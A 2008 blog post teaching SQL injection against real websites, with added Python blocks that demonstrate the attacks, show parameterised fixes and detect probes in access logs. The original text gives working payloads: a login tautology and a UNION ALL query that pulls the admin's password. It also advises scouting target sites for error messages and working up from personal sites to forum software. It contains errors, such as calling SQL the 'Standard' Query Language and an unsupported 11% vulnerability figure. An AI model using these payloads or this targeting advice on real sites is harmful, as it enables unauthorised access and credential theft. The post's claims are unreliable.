Tuesday, December 2, 2008

Complete SQL H4xxing guide

***************
SQL Hacking
***************

The step-by-step article for learning how to SQL inject
Written by: Xenon

***************

Q. What is SQL?

A. I believe strongly in knowing what you are doing, rather than knowing everything about it. SQL is an abbreviation for the Standard Query Language.

Looking at the history of the internet, we first see insecure HTTP ports open to intrusion, then the secured ones: sites with logins, and social sites that store information.
Where does all the information we fill into forms get stored? In a .txt file? I don't think so: anyone who could open that file would retrieve all of the info. Besides, how would one extract particular data rather than the whole database?


Welcome to databasing. A few common DB softwares are MySQL, MSSQL (Microsoft SQL - MS ACCESS), PostgreSQL and Oracle.
These softwares are manipulated and read by PHP code: the PHP sends a statement to the DB to work on. The syntax remains more or less standard across all these softwares, hence the name SQL.

See this:

$info = mysql_query("SELECT * FROM information WHERE username='Alex'"); // runs the statement and returns a result resource

It is highly recommended that one knows basic SQL before one hacks, so I have decided to include a few common queries in this article.

The SELECT query:

Like the one above, the SELECT retrieves data.

A table contains rows and columns.
Each column holds one type of data, and each row is a different entry. Like so:

TABLE "INFORMATION"

username | password
---------+---------
admin    | root
alex     | user


Unless we give a condition, the SELECT retrieves the entire table.
Hence, the condition:

WHERE:
WHERE username='Alex'
would extract:
username=Alex , password=user.

One or more conditions can be given, like:
WHERE some1=this OR some2=this2

or

WHERE some1=this AND some2=this2

The OR needs just one TRUE condition,
the AND needs both conditions TRUE.

LIKE: Seen in search engines.

SELECT * FROM information WHERE username LIKE 'al%'
% is the SQL wildcard (MS Access uses * instead). This would extract the same row as above, since admin starts with 'ad', not 'al'.



The UNION ALL:
Unions the results of two queries, i.e. combines the results of two SELECT statements into one.
Note that combining with UNION has a condition: both SELECT statements must return the same number of columns, even if some of those columns are 'null'.

SELECT * FROM information WHERE username='admin' UNION ALL SELECT * FROM information WHERE username='alex'

In case you wonder what * is: it is our wildcard for selecting all columns. Since both SELECTs read the same table here, * gives the same number of columns on both sides, which is what allows the UNION ALL.

This query would return both rows as the result.


The AS:
AS lets you define another name, an "A.K.A." or alias, for a particular column, a table, or even an entire subquery.
See this:

SELECT * FROM (SELECT username AS user, password AS pass FROM information WHERE username='alex') AS result_final

(The alias for the whole query has to be attached to a subquery in parentheses; an AS dangling after the WHERE clause is a syntax error.)
The comma lets you select more than one column from our DB.
So now,
user=username
pass=password

and the whole data returned = result_final

Now, if the PHP refers to user, it will show the value of the original username column.


NOTE: While SQL hacking, when a column is given an alias, the programmer probably uses that alias later in the PHP, so your UNION ALL should use the same aliases to avoid an error and get the data shown.
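The queries above (SELECT with WHERE, LIKE, UNION ALL and AS) run against the two-row INFORMATION table, as an added example that is not part of the original post. It uses Python's built-in sqlite3 module instead of PHP and MySQL, the rows are constructed sample data, and the one deliberate failure shows what the engine says when the two halves of a UNION do not have the same number of columns.

```python
import sqlite3

# Constructed rows mirroring the INFORMATION table shown above (sample data, not a real site).
ROWS = [("admin", "root"), ("alex", "user")]


def make_db():
    """Build an in-memory SQLite database holding the two-row INFORMATION table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE information (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO information VALUES (?, ?)", ROWS)
    return conn


def select_all(conn):
    # Without a WHERE clause the SELECT returns every row of the table.
    return conn.execute("SELECT username, password FROM information").fetchall()


def select_where(conn, name):
    # WHERE narrows the result to rows whose username matches the value.
    # (SQLite compares text case-sensitively, unlike MySQL's default collation.)
    return conn.execute(
        "SELECT username, password FROM information WHERE username = ?", (name,)
    ).fetchall()


def select_like(conn, prefix):
    # LIKE with the % wildcard matches any suffix, so 'al%' finds alex but not admin.
    return conn.execute(
        "SELECT username, password FROM information WHERE username LIKE ?", (prefix + "%",)
    ).fetchall()


def select_union(conn):
    # UNION ALL appends the second result set to the first; both sides return two columns.
    return conn.execute(
        "SELECT username, password FROM information WHERE username = 'admin' "
        "UNION ALL "
        "SELECT username, password FROM information WHERE username = 'alex'"
    ).fetchall()


def union_column_mismatch(conn):
    # One column on the left and two on the right: the engine rejects the UNION and says why.
    try:
        conn.execute(
            "SELECT username FROM information "
            "UNION ALL SELECT username, password FROM information"
        )
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def select_alias(conn):
    # AS renames the columns (and the subquery), so the caller sees 'user' and 'pass'.
    cur = conn.execute(
        "SELECT * FROM (SELECT username AS user, password AS pass "
        "FROM information WHERE username = 'alex') AS result_final"
    )
    names = [col[0] for col in cur.description]
    return names, cur.fetchall()


if __name__ == "__main__":
    db = make_db()
    print(select_where(db, "alex"))
    print(select_like(db, "al"))
    print(select_union(db))
    print(union_column_mismatch(db))
    print(select_alias(db))
```

The column-count error from `union_column_mismatch` is the same class of message that tip 1 below refers to: when an application prints it back to the browser, it tells the reader exactly how many columns the original query selects.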


SQL Hacking:
The basic idea is not to attack the DB software itself, but the programmer's vulnerable PHP that uses the DB.

All login forms add variables to the query so that the particular user is looked up.
This is done by the GET or POST methods.

See this:

$query = "SELECT * FROM users WHERE username='".$username."'"; // $username is pasted straight into the SQL text

Now we hack the SQL like this:

Put the value of $username in the form as:
user' OR 'a'='a

So the query will now be processed as:

SELECT * FROM users WHERE username='user' OR 'a'='a'

For the password, do the same.

This returns all the usernames and passwords, because the character 'a' is always equal to itself.
We wrote 'a'='a without a closing quote so that the quote the PHP appends closes our string; that is how we dodge the open/close inverted commas.

Sometimes one can comment out the rest of the statement that the PHP appends, using SQL comment markers such as:
/*
/**
//
--

Get to know the SQL software in use, and google its syntax.

Another SQL hack, found in blogs:

See this:

SELECT topic AS content FROM info WHERE topic_number=1

Obviously, as users click different topics, the value of topic_number changes, so topic_number is injectable. (Not always the case; SQL hacks can be protected against by cautious programmers.)

The obvious injection would be:

SELECT topic AS content, postedby AS poster, email FROM info WHERE topic_number=0 UNION ALL SELECT user AS content, password AS poster, null FROM users WHERE id=1

EXPLANATION:

We keep the same aliases for the columns so that the two queries merge cleanly.
Notice the null.

It keeps the number of columns the same so that the union succeeds; the email column is simply unioned with null, i.e. nothing.

WHERE id=1 works on the presumption that the first user registered is always the admin, and that his user id number is in the column named 'id'.
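The two injections above, the login tautology and the topic_number UNION, shown next to the parameterised queries that stop them, as an added example that is not part of the original post. It uses Python's sqlite3 with constructed users and info tables whose column names follow the post; the payload strings are exactly the ones quoted above. The point it makes that the prose does not: the vulnerability is the string concatenation, not the quote character, so a numeric parameter with no quotes at all is just as exposed, and the fix is to bind values (and for numbers, to check the type first) rather than to filter characters.

```python
import sqlite3

# Constructed sample tables modelled on the post: users holds logins, info holds blog topics.
USERS = [(1, "admin", "root"), (2, "alex", "user")]
INFO = [(1, "First post", "alex", "alex@example.invalid")]


def make_db():
    """In-memory SQLite database with the users and info tables used below."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.execute("CREATE TABLE info (topic_number INTEGER, topic TEXT, postedby TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.executemany("INSERT INTO info VALUES (?, ?, ?, ?)", INFO)
    return conn


def login_vulnerable(conn, username):
    # Mirrors the PHP concatenation: the submitted value becomes part of the SQL text,
    # so a quote in the value ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE user='" + username + "'"
    return conn.execute(sql).fetchall()


def login_safe(conn, username):
    # Parameterised query: the value travels separately from the statement, so the
    # parser never sees it as SQL and a quote inside it is just a character to compare.
    return conn.execute("SELECT * FROM users WHERE user=?", (username,)).fetchall()


def topic_vulnerable(conn, topic_number):
    # A numeric parameter has no quotes to escape, so concatenation is just as exposed:
    # the UNION payload from the post simply continues the statement.
    sql = ("SELECT topic AS content, postedby AS poster, email FROM info "
           "WHERE topic_number=" + topic_number)
    return conn.execute(sql).fetchall()


def topic_safe(conn, topic_number):
    # Validate the type first, then bind. Anything that is not an integer is rejected
    # before it gets anywhere near the database.
    try:
        n = int(topic_number)
    except ValueError:
        raise ValueError("topic_number must be an integer")
    return conn.execute(
        "SELECT topic AS content, postedby AS poster, email FROM info WHERE topic_number=?",
        (n,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "user' OR 'a'='a"
    union = "0 UNION ALL SELECT user AS content, password AS poster, null FROM users WHERE id=1"
    print("vulnerable login:", login_vulnerable(db, tautology))   # every row
    print("safe login:     ", login_safe(db, tautology))         # no rows
    print("vulnerable topic:", topic_vulnerable(db, union))      # admin credentials
    try:
        topic_safe(db, union)
    except ValueError as exc:
        print("safe topic:      rejected,", exc)
```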



***************
TIPS
***************

1. Hunt down error messages that give you table names, column names, the aliases used, etc. THIS IS A NECESSITY!

2. Check the target's site for PHP forms and variables that you give values to. Look at the URLs as you navigate.

3. Learning SQL helps!

4. You need practice, and you need to be familiar with the site. This is why even the easiest sites to hack need a week at least, to become familiar with all the variables and column and table names.

5. Try personal sites before attempting to hack IP.Boards and vBulletins.

6. For common scripts, download the script and hunt the vulnerabilities down by reading the source.

7. Be patient. It takes time to hack databases, even for the simplest sites.

8. Don't get frustrated with large errors. Copy them into a text editor, make the font comfortable, and read through them.

9. Never target just one page on the site. Look at all the scripts: different errors give different table names.

10. Google for vulnerabilities in common software, the syntax of the DB software, and articles; study the site's pattern; and be bold enough to guess column names, like 'id'.
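Tips 1, 8 and 9 all rest on the application echoing database errors, and the probes in this post leave a distinctive trace in the web server's access log. The following is an added example, not part of the original post, of how a site operator would spot both from the log: it parses constructed Common Log Format lines (sample data, not real traffic), decodes each query parameter, and flags the three probe shapes quoted above (the ' OR 'a'='a tautology, UNION ALL SELECT, and trailing comment markers); any flagged request answered with a 5xx is a sign that the database error reached the browser, which is the leak tip 1 relies on.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed access-log lines (not real traffic). The first two are ordinary requests;
# the last three carry the probe patterns quoted in the post, URL-encoded as a browser sends them.
LOG_LINES = [
    '10.0.0.5 - - [02/Dec/2008:10:00:01 +0000] "GET /blog.php?topic_number=1 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [02/Dec/2008:10:00:07 +0000] "GET /login.php?username=alex HTTP/1.1" 200 512',
    '10.0.0.9 - - [02/Dec/2008:10:01:13 +0000] "GET /login.php?username=user%27+OR+%27a%27%3D%27a HTTP/1.1" 200 9001',
    '10.0.0.9 - - [02/Dec/2008:10:01:20 +0000] "GET /blog.php?topic_number=0+UNION+ALL+SELECT+user,password,null+FROM+users HTTP/1.1" 500 311',
    '10.0.0.9 - - [02/Dec/2008:10:01:25 +0000] "GET /blog.php?topic_number=1%27-- HTTP/1.1" 500 290',
]

# Common Log Format: client, identd, user, [timestamp], "METHOD target PROTO", status, size.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each rule names one probe shape from the post and a pattern applied to the decoded parameter value.
RULES = [
    ("tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),   # ' OR 'a'='a
    ("union", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),  # UNION ALL SELECT ...
    ("comment", re.compile(r"--|/\*")),                              # trailing comment markers
]


def parse_line(line):
    """Split one log line into client, path, status and decoded query parameters."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    url = urlparse(target)
    # parse_qsl undoes both %XX escapes and '+' for space, so the rules see the value the app saw.
    params = parse_qsl(url.query, keep_blank_values=True)
    return {"ip": ip, "time": ts, "method": method, "path": url.path,
            "status": int(status), "params": params}


def scan(lines):
    """Return (ip, path, parameter, matched rule names, status) for every suspicious parameter."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            matched = [rule for rule, pat in RULES if pat.search(value)]
            if matched:
                hits.append((rec["ip"], rec["path"], name, matched, rec["status"]))
    return hits


def error_responses(hits):
    """Probes answered with a 5xx: the application is most likely echoing database errors."""
    return [h for h in hits if h[4] >= 500]


if __name__ == "__main__":
    found = scan(LOG_LINES)
    for hit in found:
        print(hit)
    print("probes that produced server errors:", len(error_responses(found)))
```

The rules are deliberately narrow (they match the exact shapes in this post) so the example stays readable; in practice the same loop feeds a broader rule set, and the 5xx check is the part worth acting on first, since turning off verbose database errors removes what tips 1, 8 and 9 depend on.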

---

Remember: 11% of websites on the net are vulnerable to SQL injection.

11% is a huge figure, considering the number of websites out there.

---
source from 1,2
